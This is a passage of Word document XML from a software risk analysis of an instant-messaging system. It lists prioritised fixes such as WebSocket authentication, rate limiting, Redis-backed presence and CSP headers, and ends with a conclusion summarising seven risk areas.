        <w:t xml:space="preserve"> — Wrap root application and chat viewport in fallback components to prevent White Screen of Death crashes (addresses Risk Area 7). 6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add Socket Connection State UI Banner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Render real-time visual alerts ("Offline", "Reconnecting...") based on socket event listeners (addresses Risk Area 7). 7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add per-socket rate limiting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Prevent event flooding by limiting socket emissions to a reasonable rate (addresses Risk Area 2). 8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Generate unique passwords for Quick Connect users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Replace the hardcoded password with cryptographically random generated passwords (addresses Risk Area 1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.3 Medium Priority (Resilience &amp; Performance)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement Redis-backed presence store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Migrate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>onlineUsers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Map to Redis for crash-resilient presence tracking (addresses Risk Areas 3 &amp; 5). 10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add Node.js clustering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Utilize multiple CPU cores for improved throughput and fault tolerance (addresses Risk Area 5). 11. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cache unread counts in Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Reduce per-request aggregation overhead by maintaining incremental counters (addresses Risk Area 5). 12. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement input submission debounce &amp; lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Disable send triggers while HTTP message submission is in-flight (addresses Risk Area 7). 13. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Decompose React Context &amp; apply `React.memo`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Eliminate re-render cascades on high-frequency chat events (addresses Risk Area 7).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.4 Low Priority (Hardening)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">14. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add input validation middleware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Implement content length limits, regex escaping, and request body size limits (addresses Risk Area 6). 15. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add database indexes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Create compound indexes on frequently queried fields to optimize query performance (addresses Risk Areas 4 &amp; 5). 16. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement Content Security Policy headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Add CSP headers to further reduce XSS attack surface (addresses Risk Area 1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This analysis identified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7 distinct risk areas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across both backend services and frontend client architecture of the Instant Messaging system:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Security Vulnerabilities (Areas 1 &amp; 2):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Missing WebSocket authentication and localStorage token storage represent immediate security concerns requiring priority remediation. 2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Architectural &amp; Scalability Limits (Areas 3, 4, &amp; 5):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> In-memory presence tracking, unpaginated message loading, and single-process execution represent boundaries suitable for a prototype but restrictive for production scale. 3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Frontend &amp; User Experience Fragility (Area 7):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unvirtualized DOM rendering, unhandled state exceptions (White Screen), and silent socket disconnects threaten client-side stability during high-volume usage. 4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Input Sanitization (Area 6):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Standard edge cases requiring defensive hardening.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Crucially, this analysis establishes an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exhaustive, full-stack risk foundation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Milestone 2. By identifying these concrete design trade-offs and code vulnerabilities now, the development team possesses a clear, justifiable blueprint for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Revised Design and Implementation enhancements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scheduled for delivery in Milestone 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Page </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> of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3E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